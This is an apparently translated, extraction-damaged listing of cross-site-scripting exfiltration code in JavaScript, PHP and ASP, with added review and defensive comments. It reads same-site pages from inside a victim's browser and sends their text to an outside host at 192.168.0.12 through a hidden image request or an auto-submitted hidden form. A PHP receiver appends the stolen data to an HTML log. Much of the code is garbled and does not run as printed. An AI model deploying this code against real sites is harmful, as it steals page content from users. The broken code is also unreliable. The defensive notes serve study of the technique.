Js:
// Top-level driver: attaches Internet Explorer's legacy "download" default
// behavior to <body> and calls startDownload(url, callback) for each listed page.
// NOTE(review): identifier case on this page was altered by extraction
// (Document/document, mycars/Mycars/MYCARS, getdata/GetData), so the listing
// is illustrative and does not run as printed.
// Defender's view: the read depends on the script executing inside the page's
// own origin, so output encoding of user-controlled content and a restrictive
// Content-Security-Policy for script sources remove the precondition.
Document.body.addBehavior ("#default #download");
var mycars = new Array ();
// Relative page names; presumably pages on the same site as the hosting document.
Mycars[0] = "l.htm";
MYCARS[1] = "y.htm";
for (x in Mycars)
{
// The callback is passed to startDownload, and GetData is also called directly
// with `source`, which is not defined at this scope.
if (Document.body.startDownload (Mycars[x],getdata)) {
GetData (source);
}
}
// Callback for the download: URL-escapes the received text and passes it on
// to getreaded().
function GetData (source)
{
// escape() encodes the page text so it can be carried in a URL query string.
// NOTE(review): Txt is assigned without `var` and read back as TXT; the case
// difference comes from the extraction damage noted on this page.
Txt=escape (source);
getreaded (TXT);
}
// Transmits `usr` by setting an image URL, so the data leaves as the query
// string of an ordinary image request and the response is ignored.
// Defender's view: this channel shows up in proxy and web-server logs as image
// fetches with unusually long `key=` query strings to a host other than the
// page's own. A CSP `img-src` limited to trusted hosts blocks it.
function getreaded (usr) {
var newimg = new Image ();
Newimg.src= "http://192.168.0.12/style.php?key=" + "\ n" + "\ n" +usr+ "\ n" + "\ n";
}
Php:
<?php
// Declares the response as HTML in the GB2312 charset.
Header (' content-type:text/html;charset=gb2312 ');
/**
 * Reverses JavaScript escape() output: URL-decodes the string, then converts
 * %uXXXX, &#xXXXX; and &#NNN; sequences from UCS-2 to UTF-8 and joins the
 * pieces back together.
 *
 * NOTE(review): spacing, case and parentheses in this listing were damaged by
 * extraction (e.g. "= =", unbalanced Iconv calls); it does not parse as printed.
 */
function Unescape ($STR) {
$str = Rawurldecode ($STR);
// Split the input into encoded tokens and runs of plain text.
Preg_match_all ("/%u.{4}|& #x. {4};|&#\d+;|.+/u", $str, $r);
$ar = $r [0];
foreach ($ar as $k => $v) {
// %uXXXX: the last four hex digits are the code unit.
if (substr ($v, 0,2) = = "%u")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v,-4));
// &#xXXXX; : hex digits between the prefix and the trailing semicolon.
ElseIf (substr ($v, 0,3) = = "& #x")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v, 3,-1));
// &#NNN; : decimal value packed as a 16-bit big-endian integer.
ElseIf (substr ($v, 0,2) = = "&#") {
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("n", substr ($v, 2,-1));
}
}
return join ("", $ar);
}
// Receiver: decodes the `key` query parameter and appends it to news.html.
// NOTE(review): the value is written with no HTML encoding, size limit or
// authentication, and the fopen() handle is neither checked nor closed.
// Any client that can reach this script can append arbitrary markup to the file.
// If news.html is served as HTML (presumably, given the name), the captured
// content will execute in the viewer's browser, so open such logs as plain text.
$file = "news.html";
$_get[' key ']=unescape ($_get[' key ');
Fputs (fopen ($file, ' A + '), $_get[' key ']);
?>
================================================= The following is the general-purpose version ===============
<%
' Page setup: buffers the response, then fetches two pages server-side.
' Each Send(n) holds the escaped, link-rewritten HTML returned by Pagewebproxy.
' The URLs are hard-coded here; nothing in this block takes them from the request.
Response.Buffer = True
Dim Surlb,send (2)
Send (0) =escape (pagewebproxy ("http://192.168.0.5/sohu.htm"))
Send (1) =escape (Pagewebproxy ("http://192.168.0.5/c.htm"))
' Pagewebproxy: fetches Xmlpath through Gethttppage and runs a series of
' regular-expression replacements over the returned HTML so that link
' attributes (src/action/href/background) and window.open/url(...) arguments
' are rewritten against the fetched page's location. Returns the rewritten HTML.
' NOTE(review): the patterns below were corrupted by extraction (stray spaces,
' altered case and quoting), so their exact matching rules cannot be confirmed
' from this page and the listing does not run as printed.
' NOTE(review): none of the replacements removes script content, so the
' returned markup must still be treated as untrusted by whatever renders it.
function Pagewebproxy (Xmlpath)
Dim I, Re, URL, Html
URL = Xmlpath
Set re = New RegExp
Re. IgnoreCase = True
Re. Global = True
' SURLB is a page-level variable (declared outside this function); it keeps
' the full URL and is later trimmed at the first "?".
SURLB = Url
Html = Gethttppage (URL)
' Reduce URL to its directory part (everything up to the last "/").
url = Left (URL, InStrRev (URL, "/")
i = InStr (surlb, "?")
If i > 0 Then
SURLB = Left (surlb, i-1)
End If
Re. Pattern = "(href|action) = (\ ' | ' |")? (\?)"
Html = Re. Replace (Html, "$1=$2" & surlb & "?")
' Absolute URLs are temporarily renamed (attribute + "x") so that the
' relative-URL passes below skip them. They are restored further down.
Re. Pattern = "(src|action|href) = (\ ' | ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1x=$2$3$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$1x ($2$3$2)")
' Relative paths are prefixed with the page directory. Root-relative paths
' are prefixed with the host taken from Split(URL, "/")(2).
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? ([^\/"" \ "][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2" & Url & "$3$2")
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? \/([^ "" \ '][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$3$2")
Re. Pattern = "(src|action|href) = (\ ' | ' |")? \/(\'|"")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ([^\/"" \ "http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$" & Url & "$3$2)")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? \/([^ "" \ ' http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$ ($2http://" & Split (URL, "/") (2) & "/$3$2")
' Entity handling: every "&" is first turned into "%26", then selected
' entities are mapped back to literal characters.
HTML = Replace (HTML, "&", "%26")
' Host-specific special case for how "&amp;" is restored.
If Split (URL, "/") (2) = "club.isso.com.cn" Then
HTML = Replace (HTML, "%26amp;", "%26")
Else
HTML = Replace (HTML, "%26amp;", "&")
End If
HTML = Replace (HTML, "%26NBSP;", "")
HTML = Replace (HTML, "%26LT;", "<")
HTML = Replace (HTML, "%26GT;", ">")
HTML = Replace (HTML, "%26quot;", "" ")
HTML = Replace (HTML, "%26copy;", "©")
HTML = Replace (HTML, "%26reg;", "®")
HTML = Replace (HTML, "%26raquo;", "»")
HTML = Replace (HTML, "%26%26", "&&")
HTML = Replace (HTML, "%26#", "&#")
' HTML = Replace (HTML, '%26 ', ' "')
' Restore the attributes that were renamed with the "x" suffix above.
Re. Pattern = "(src|action|href) x= (\ ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1=$2$3$2")
Re. Pattern = "((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) "'" (gif|jpg|bmp|png)) "
Html = Re. Replace (Html, "? url=$1")
Re. Pattern = "\?url=" & URL & "(#|javascript:)"
Html = Re. Replace (Html, "$")
' Removes the multipart/form-data enctype text from the markup.
Re. Pattern = "Multipart\/form-data"
Html = Re. Replace (Html, "")
Pagewebproxy=html
End Function
' gethttppage: requests URL server-side with an MSXML2 XMLHTTP object.
' If the incoming request carries form fields, they are re-encoded and
' replayed to URL as a POST; otherwise a GET is sent. Both calls are
' synchronous (third argument of open is False).
' The response is then handled by the URL's file extension:
'   - image/js extensions: raw bytes written to the client, response ended
'   - archive/executable extensions: raw bytes sent as an attachment
'   - anything else: body decoded as GB2312 and returned to the caller
' NOTE(review): the caller on this page passes hard-coded URLs. If URL were
' ever derived from request data, this function would fetch arbitrary
' internal or external addresses on the server's behalf, so it would need a
' host allow-list before any such reuse.
' NOTE(review): several lines were damaged by extraction (unbalanced
' quotes and parentheses); the listing does not run as printed.
Function gethttppage (URL)
Dim Http, Thestr, Fileext
Set Http = Server.CreateObject ("MSXML2.") XMLHTTP ")
If Request.Form.Count > 0 Then
' Rebuild the client's form body as name=value pairs, URL-encoded.
For each x in Request.Form
Thestr = thestr & Server.URLEncode (x) & "=" & Server.URLEncode (Request.Form (x)) & "&"
Next
Http.open "POST", url, False
Http.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Http.send (THESTR)
Else
Http.open "Get", url, False
Http.send ()
End If
' Early exit when the request did not complete; the function then returns
' Empty and the Set Http = Nothing below is skipped.
If Http.readystate<>4 then Exit Function
' The type decision uses the text after the last "." of the URL, not the
' response's Content-Type header.
Fileext = LCase (Mid (URL, InStrRev (URL, ".") + 1)
If InStr ("$jpg $gif$bmp$png$js$", "$" & Fileext & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responsebody
Response.End ()
Else
If InStr ("$rar $mdb$zip$exe$com$ico$", "$" & Fileext & "$") > 0 Then
' The download filename is taken from the last path segment of SURLB.
Response.AddHeader "Content-disposition", "attachment"; Filename= "& Mid" (SURLB, InStrRev (SURLB, "/") + 1)
Response.BinaryWrite Http.responsebody
Response.Flush
Else
Gethttppage = Bytestobstr (Http.responsebody, "GB2312")
End If
End If
Set Http = Nothing
End Function
' Bytestobstr: converts a binary response body to a string in the charset
' named by Cset, using an ADODB.Stream as the conversion buffer.
Function Bytestobstr (Body,cset)
Dim objstream
Set objstream = Server.CreateObject ("ADODB.stream")
' Type 1 = binary, Mode 3 = read/write.
Objstream. Type = 1
Objstream. Mode =3
Objstream. Open
Objstream. Write body
' Rewind, then switch the stream to text (Type 2) so ReadText decodes the
' bytes with the requested charset.
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
Bytestobstr = objstream. ReadText
Objstream. Close
Set objstream = Nothing
End Function
%>
// Client-side output of the ASP page above. It writes a hidden iframe and a
// hidden form into the document, fills two hidden fields with a source URL
// plus the page content prepared server-side (send(0) / send(1)), and submits
// the form from script.
// The form posts to http://192.168.0.12/xss.asp and targets the hidden iframe,
// so the submission causes no visible navigation in the hosting page.
// Defender's view: a CSP `form-action` directive limited to the site's own
// origin blocks this post. In proxy logs it appears as a cross-host POST
// with large `var` / `vartwo` bodies.
// NOTE(review): identifier case and spacing were altered by extraction
// (Document/document, "var"/"Vartwo"), so the listing does not run as printed.
Document.writeln ("<iframe name=\" mimi\ "Src=about:blank style=display:none><\/iframe>")
Document.writeln ("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=post target=mimi>");
Document.writeln ("<input id=var name=var type=hidden>");
Document.writeln ("<input id=vartwo name=vartwo type=hidden>");
Document.writeln ("<input type=submit style=display:none>");
Document.writeln ("<\/form>")
document.getElementById ("var"). Value = ' http://192.168.0.5/sohu.htm ' +unescape (' <%=send (0)%> ');
document.getElementById ("Vartwo"). Value = ' http://192.168.0.5/c.htm ' +unescape (' <%=send (1)%> ');
document.getElementById ("form"). Submit ();